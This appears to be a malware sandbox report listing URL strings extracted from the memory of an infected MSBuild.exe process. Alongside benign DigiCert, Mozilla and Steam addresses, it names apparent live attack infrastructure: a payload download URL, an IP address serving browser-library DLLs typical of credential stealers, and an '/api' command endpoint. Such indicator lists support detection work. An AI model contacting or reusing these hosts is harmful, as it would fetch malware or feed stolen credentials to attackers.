Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr String found in binary or memory: http://ocsp.digicert.com0
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://playd.healthnlife.pk/ldms/a43486128347.exe
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://playd.healthnlife.pk/ldms/a43486128347.exeJ
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://playd.healthnlife.pk/ldms/a43486128347.exej
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://playd.healthnlife.pk/ldms/a43486128347.exeorm-data;
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.7.dr String found in binary or memory: http://upx.sf.net
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: MSBuild.exe, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.4.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2201341180.000000001FE5D000.00000002.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199780418869[1].htm.4.dr String found in binary or memory: https://49.12.197.9
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9//w
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/freebl3.dll
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/l
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/mozglue.dll
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/msvcp140.dll
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/msvcp140.dll5
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/nss3.dll
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/nss3.dllrsg47
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/softokn3.dll
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/sqlp.dll
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/vcruntime140.dll
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/vcruntime140.dllU
Source: MSBuild.exe, 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9ECAAFH
Source: HCAEHD.4.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001382000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://advocachark.store/
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001351000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://advocachark.store/1$~
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001382000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://advocachark.store/Ri
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001382000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://advocachark.store/api
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001382000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://advocachark.store/api;
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001351000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://advocachark.store/api;$~(9
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001382000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://advocachark.store/bixd4
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001351000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://advocachark.store:443/api
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a
Source: 76561199780418869[1].htm.4.dr String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: HCAEHD.4.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: HCAEHD.4.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: HCAEHD.4.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.co
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=2ZRoxzol
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwP
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=HeLxjRDbQrcV&l=e
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.dr String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: HCAEHD.4.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: HCAEHD.4.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: HCAEHD.4.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://help.steampowered.com/en/
Source: BAECFC.4.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr String found in binary or memory: https://mozilla.org0/
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.n
Source: 76561199780418869[1].htm.4.dr String found in binary or memory: https://steamcommunity.com/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://steamcommunity.com/discussions/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199780418869[1].htm.4.dr String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr String found in binary or memory: https://steamcommunity.com/market/
